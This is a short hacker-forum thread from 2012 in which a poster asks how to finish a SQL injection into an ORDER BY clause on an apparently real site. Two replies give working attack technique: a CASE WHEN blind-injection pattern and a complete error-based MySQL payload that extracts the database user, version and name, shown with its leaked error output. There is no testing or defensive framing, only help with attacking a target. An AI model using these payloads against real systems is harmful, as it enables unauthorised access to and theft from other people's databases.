Paid Advertising is
ha.ckers sla.cking
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Strange SQLI
Posted by: Nerder
Date: April 07, 2012 11:41AM

the sqlI is this:'11

But it's sò so strange because when i tried to find the columns with ORDER BY, ( but the error that its printed was different from usual.
But trying to increase the value of the variable "s_ordine, when i was arrived at 12... PUFF "Database Error: Unknown column '12' in 'order clause' "

Then in conclusion: [true] [false]

The query is: ORDER BY ($ s_ordine) [OwN SQL CODE] LIMIT 0,8;

How i complete this Injection?
Someone could help me find the correct syntax?


Options: ReplyQuote
Re: Strange SQLI
Posted by: Razor4x
Date: April 07, 2012 03:26PM

this becouse ure injecting in an ORDER BY clause and it sort by the input... u cant do normal sqli after order by so u must bsqli with the case when statemant like that => (case when (1=0) then name else email end)

where name and email are the current table's columns

Options: ReplyQuote
Re: Strange SQLI
Posted by: p0pc0rn
Date: April 07, 2012 10:28PM

use error based method and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x3a,version(),0x3a,database(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Database Error: Duplicate entry '~''~1' for key 1

Options: ReplyQuote

Sorry, only registered users may post in this forum.